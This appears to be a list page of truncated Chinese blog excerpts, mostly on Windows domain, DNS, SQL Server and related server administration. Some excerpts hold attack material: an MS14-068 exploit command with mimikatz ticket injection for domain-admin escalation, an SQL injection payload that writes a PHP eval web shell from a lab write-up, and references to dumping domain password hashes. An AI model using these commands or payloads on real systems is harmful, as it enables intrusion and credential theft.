windows 域服务器采用vmware converter进行物理机转换为虚拟机,需要在完成后进行退域重新加域操作. 否则,有可能会出现服务器在30天后脱域情况.出现脱域情况,可以通过退域加域的方式恢复故障…

原创地址:http://www.cnblogs.com/jfzhu/p/4022999.html 转载请注明出处 AD域内需要有DNS服务器,用于解析域内的计算机名,但是域内的计算如何解析公网的域名呢?当然一种方式是将域内每台计算机都额外添加一个公共DNS服务器:另外一种比较简便的方法就是在域内DNS服务器上增加一个转发器(Forwarder). 演示环境使用的是Windows 2008,两台计算机在同一域内,一台是DNS服务器,另一台是其他用途的计算机,下面演示如何设置DNS服务器,使得另一台…

https://github.com/bidord/pykek ms14-068.py Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain group…

一台域内的服务器时间不停地被修改,我先向用户收集了一些信息 只有这一台出现此问题,其他服务器均为正常(补充一下,问题快解决完的时候用户告诉我一个重要的消息,就是时间被修改了一段时间后自动会被修改回去) 系统版本\服务器用途(考虑是否有软件会造成此问题)\日志信息\是否为虚拟机 1.系统版本是Server 2008 数据中心版 2.用途就是一台做图的服务器 3.日志信息如下图,这个日志是系统日志,事件ID为1,时间从2016-7-21 00:50:59 被改为 2016-07-21 08:32:3…

0x01 漏洞起源 说到ms14-068,不得不说silver ticket,也就是银票.银票是一张tgs,也就是一张服务票据.服务票据是客户端直接发送给服务器,并请求服务资源的.如果服务器没有向域控dc验证pac的话,那么客户端可以伪造域管的权限来访问服务器.所以ms14-068的来源和银票是息息相关的. 在mimikatz作者的ppt里面是这样描述的: 所以说这真的是一个大漏洞,允许域内任何一个普通用户,将自己提升至域管权限.微软给出的补丁是kb3011780.在server 2000以上的…

创建备份域控制器 这里就拿windows 2012 R2来当备份域控 如果一个域内有多个域控制器,可以有如下好处. 提高用户登录的效率:如果同时有多台域控制器对客户提供服务,可以分担审核用户登录身份(账户与密码)的负担,让用户登录效率更佳. 排错功能:如果有域控制器发生故障,此时依然能有其他正常的域控制器继续提供域服务器. win+R  rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,0  我们先把常用图标显示出来 我们将 DC2 升级为域控制…

 可以让任何域内用户提升为域管理员     c:\python27\python.exe ms14-068.py -u k8test3@k8.local -p k8team!@# -s S-1-5-21-4191298166-3247023184-3514116461-1110 -d K8DNS.k8.localmimikatz.exe "kerberos::ptc TGT_k8test3@k8.local.ccache" exit       ms14-068.py Exploits…

文章参考 https://social.technet.microsoft.com/Forums/zh-CN/21a5f5e9-feee-4454-acad-fd22989d7bed/2249529615226592131932423332672016?forum=windowsserversystemzhchs 环境: 2台windows 2008 R2 域控制服务器,是早期由windows 2003域环境升级而来 林和域的功能级别为 windows 2003 计划添加一台windows 20…

因为篇幅原因,AlwaysOn可用性组被拆成了两部分:理论部分和实战部分.而实战部分又被拆成了准备工作和AlwaysOn可用性组搭建. 三篇文章各自的链接: SQL Server ->> 高可用与灾难恢复(HADR)技术 -- AlwaysOn(理论篇) SQL Server ->> 高可用与灾难恢复(HADR)技术 -- AlwaysOn(实战篇)之建立活动目录域.DNS服务器和Windows故障转移群集(准备工作) SQL Server ->> 高可用与灾难恢复(H…

1:  windows server 2003 额外域控升级为 windows server 2003主域控 (因为原域控制器某些服务损坏,于是采用将备用域控升级为主域控的方法) https://wenku.baidu.com/view/f6289304ba1aa8114531d903.html 2: windows server 2003新备用域控DNS迁移到windows server 2003新主域控 目标DNS服务器同时可为windows server 2003系列或者windows s…

svn从Windows服务器迁移到Linux服务器    author:headsen chen   2017-10-16  16:50:32  个人原创,转载请注明.否则依法追究法律责任      1,进入svn的安装目录,找到bin的文件夹   2,开始制作dump文件 3,将dump文件通过windows共享等传到本地.然后ssh连接到Linux服务器.利用xftp上传文件到Linux服务器上 4,Linux服务器上安装好svn服务: 创建svn的主目录: mkdir -p /a/svn…

外网zabbix-server使用主动模式监控公司内网windows服务器 1.Zabbix Agent active批量调整客户端为主动模式监控将Template OS Windows模板调整为主动模式具体参考http://www.cnblogs.com/reblue520/p/6284398.html 2.客户端win2008zabbix-agent客户端安装:具体参考:http://www.cnblogs.com/reblue520/p/6929031.html 客户端配置:# egrep…

一.简介 在上一章中已经安装好了openvpn,并且已经启动成功,现在就可以通过openvpn的客户端进行连接访问内网服务器了. 二.安装openvpn客户端 下载地址: https://www.techspot.com/downloads/5182-openvpn.html 下载对应的版本进行安装. 三.安装完成 ① 安装完成后,在openvpn的config目录下建立连接目录 ② 然后将服务端生成的配置文件拷贝到该目录下 ③  从模板中拷贝一份client.ovpn文件到该目录下,文件内容:…

原文: http://blog.csdn.net/chagaostu/article/details/45195817 给内网的服务器安装软件 直接用yum install XXX的话,会告知找不到源.公司屏蔽外网就是烦啊. 在公司的windows服务器上发现源,CentOS-6.5-x86_64-bin-DVD1.iso 第一步要挂载远程服务器,使用samba mount -t cifs -o username="user",password=XXX   //XXX.XX.XX.XX…

windows 2008新建域时,本地administrator账户将成域Administrator账户.无法新建域,因为本地administrator账户密码不符合要求.*解决办法:很多人都会想到在组策略里面更改.点击“开始→运行”,在“运行”对话框中键入“gpedit.msc”进入“组策略编辑器”就能进行修改,没想到在“组策略编辑器”中根本修改不了. 其实在域控制器里,修改用户密码和策略要在域策略里进行.依次点击“开始→设置→控制面板→管理工具→域安全策略”,进入“默认域安全设置”后,点击“…

SID是什么意思SID 只是安全标识符的缩写而已.SID 的全称是“安全标识符(Security Identify)”,是为域或本地计算机中创建的每个帐户分配的唯一 ID 字符串(例如,S-1-5-21-1454471165-1004336348-1606980848-5555). 活动目录seo提示:active directory活动目录域中每一个对象也有一个唯一标识,成为GUID.GUID＝SID + RID .活动目录中专门有一个操作主机角色叫RID,就是为域中的每个对象分配一个RID号…

一.DNS服务器的类型 ①Primary DNS Server(Master) 一个域的主服务器保存着该域的zone配置文件,该域所有的配置.更改都是在该服务器上进行,本篇随笔要讲解的也是如何配置一个域的主DNS服务器 ②Secondary DNS Server(Slave) 域从服务器一般都是作为冗余负载使用,一个域的从服务器是从该域的主服务器上抓取zone配置文件,从服务器不会进行任何信息的更改,zone配置文件的修改只能在主DNS服务器上进行,所有的修改都有主服务器同步 ③Caching…

Active Directory概述:          使用 Active Directory(R) 域服务 (AD DS) 服务器角色,可以创建用于用户和资源管理的可伸缩.安全及可管理的基础机构,并可以提供对启用目录的应用程序(如 Microsoft(R) Exchange Server)的支持.     AD DS 提供了一个分布式数据库,该数据库可以存储和管理有关网络资源的信息,以及启用了目录的应用程序中特定于应用程序的数据.运行 AD DS 的服务器称为域控制器.管理员可以使用 AD …

本文转自先知社区,原文链接:https://xz.aliyun.com/t/2527#toc-10 原文地址:https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes <h1>在渗透测试的过程中,当我们已经是域管权限时,就可以实现提取所有域内用户的密码哈希以进行离线破解和分析,这是非常常见的一个操作.这些哈希值存储在域控制器(NTDS.DIT​​)中的数据库文件中,并带有一些其他信息,如组中成员身份和用户.</h1…

http://dngood.blog.51cto.com/446195/685082/ VMware Converter  有啥用? VMware Converter 是一款能将物理电脑系统.VMware其他版本虚拟机镜像或第三方虚拟机镜像转化为一个虚拟机映像文件的工具,而且生成的映像可以在该公司的VMware虚拟机软件中使用. 组件功能 vCenter Converter服务器端:实现整个迁移过程的核心组件,执行虚拟机格式装换和重新配置等关键任务:  vCenter Converter客户端:…

0 准备阶段 1. Windows Server 服务器 3台(其中域控服务器配置可降低一个水准,目前博主试用的是:域控服务器--2核4G 数据库服务器(节点)--4核8G ) 2. SQL Server 数据库(目前博主采用SQL 2016) 注意:在真实生产环境计算机名是需要修改的. 1 开始搭建 步骤1.1:搭建域控服务器 1. 选择确定的域控服务器,修改域控机器名. 2. 配置域控ip,ipv6去掉,因为DNS服务器就安装在域控上,所以首选DNS服务器填写:127.0.0.1 回环地址…

1.域(Domain) •它是什么? –是一个逻辑上管理的WebLogic Server组,这些组从管理上当作一个整体来操作 •域里面有什么? –服务器 –服务器集群 –机器 •规则: –同一个域中的所有WebLogic服务器实例必须处于同样的版本. –域中的服务器可以处于不同的维护包水平,只要管理服务器处于同样维护包水平或高于受管服务器.   2.服务器(Server) •它是什么? –Server 是在虚拟机中运行的weblogic.Server 实例 •有哪些服务器类型? –管理服务器(A…

weblogic 域,管理服务器,受管服务器,集群和机器的基本知识 1.域(Domain) •它是什么? –是一个逻辑上管理的WebLogic Server组,这些组从管理上当作一个整体来操作 •域里面有什么? –服务器 –服务器集群 –机器 •规则: –同一个域中的所有WebLogic服务器实例必须处于同样的版本. –域中的服务器可以处于不同的维护包水平,只要管理服务器处于同样维护包水平或高于受管服务器.   2.服务器(Server) •它是什么? –Server 是在虚拟机中运行的webl…

前言 掌控安全里面的靶场内网渗透,练练手! 内网渗透拿域控 环境:http://afsgr16-b1ferw.aqlab.cn/?id=1 1.进去一看,典型的sql注入 2.测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路径,直接拿shell,进入主题 ①将shell.php写入网站根目录,payload http://afsgr16-b1ferw.aqlab.cn/?id=1.1 union select 1,"<?php eval($_REQUEST[gylq]);?>&…

0x00 前言简述 最近单位在做等保测评,由本人从事安全运维方面的工作(PS:曾经做过等保等方面的安全服务),所以自然而然的与信安的测评人员一起对接相关业务系统的检查,在做主机系统测评检查时发现了系统中某些配置不符合等保要求,需要对不满足要求的主机做进一步整改,好在我们众多的系统基本都是运行在虚拟机…

遇到的问题: 最近基于Cesium来做3D模型的地图开发,在访问自己发布的WMS服务之后,遇到了GeoServer跨域问题. 调用这个WMS服务的时候,浏览器(我用Chrome)开发者工具报错: 控制台提示如下: Font from origin 'http://xxxxxxxxxxxxx' has been blocked from loading by Cross-Origin Resource Sharing policy: No 'Access-Control-Allow-Origin'…

我们开发的页游General War(http://gw.gamebox.com)上线运营也有半年多了,服务器的开发到运维基本都由我一手包办,在服务器上线之后我们又招了一个程序员接手后续功能的开发,而我则主要转到后台工具开发和服务器运维上.说到服务器的运维,我的全部经验就是维护过几台小型企业的域控,在linux上部署过几个web服务,以前做游戏的时候运维都是交给运营方去打点,而这次我是主动承担了这部分的工作. 由于我们的游戏服务器框架(EasyGame)是基于.net技术开发的,所以选择wind…

导读 对于帐户统一管理系统或软件来说,在 Linux 下你可能知道 NIS.OpenLDAP.samba 或者是 RedHat.IBM 的产品,在 Windows 下当然就是最出名的活动目录 (AD)了,这里就来探讨一下如何让 Linux 的计算机加入 AD 域. 首先,先简单介绍一下 AD 域.自 Windows 2000 以来,AD 一直是 Windows 的身份验证和目录服务,AD 基于 LDAP 实现其功能,其使用 DNS 进行主机名的解析,使用 Kerberos V5 进行用户身份验证…

如何在客户端配置ODBC来访问远程DB2 for Windows服务器                                  马根峰                    (广东联合电子服务股份有限公司, 广州 510300) 摘要     本文详细地介绍了如何在客户端配置DB2for Windows的ODBC数据源,然后又以“万能数据库查询分析器”的中文版本<DB 查询分析器>为工具,通过配置的ODBC数据源来访问远程基于Windows2000 Server操作系统的DB2数据库…

在Windows Server 2012 R2 DataCenter 环境中搭建集群之前,首先要对Windows服务器故障转移集群(Windows Server Failover Cluster,简称WSFC)有基本的了解.WSFC必须部署在域管理环境中,由多台服务器组成,每台服务器称作一个“结点”(Node),每个结点上都运行了Windows服务器故障转移集群服务,整个集群系统允许部分结点掉线.故障或损坏而不影响整个系统的正常运作.集群自动检测结点的健康状态,一旦活跃结点发生异常,变为不可用,…